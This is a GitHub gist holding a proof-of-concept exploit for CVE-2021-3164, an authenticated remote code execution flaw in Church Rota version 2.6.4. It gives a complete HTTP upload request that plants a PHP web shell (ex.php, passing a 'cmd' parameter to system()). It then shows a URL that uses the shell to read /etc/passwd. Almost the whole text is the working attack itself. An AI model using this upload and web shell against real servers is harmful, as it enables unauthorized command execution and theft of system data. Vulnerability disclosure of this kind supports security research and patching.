Skip to content

Instantly share code, notes, and snippets.

@pikpikcu

pikpikcu/cve-2021-3164.md

Created March 3, 2021 10:07
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save pikpikcu/e3795f4f84a8e0182bcb046df41d8dc7 to your computer and use it in GitHub Desktop.
Save pikpikcu/e3795f4f84a8e0182bcb046df41d8dc7 to your computer and use it in GitHub Desktop.
Download ZIP
POC cve-2021-3164 Church Rota version 2.6.4
Raw
cve-2021-3164.md

Church Rota version 2.6.4 is vulnerable to authenticated remote code execution. The user does not need to have file upload permission in order to upload and execute an arbitrary file.

POST /resources.php?action=newsent HTTP/1.1
Host: 192.168.43.187
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------36504512417128952451539028145
Content-Length: 526
DNT: 1
Connection: close
Referer: http://192.168.43.187/resources.php?action=new
Upgrade-Insecure-Requests: 1

-----------------------------36504512417128952451539028145
Content-Disposition: form-data; name="resourcename"

test
-----------------------------36504512417128952451539028145
Content-Disposition: form-data; name="resourcefile"; filename="ex.php"
Content-Type: text/plain

<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
-----------------------------36504512417128952451539028145
Content-Disposition: form-data; name="resourcedescription"

<p>pocccc</p>
-----------------------------36504512417128952451539028145--
http://192.168.43.187/documents/ex.php?cmd=cat%20/etc/passwd
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment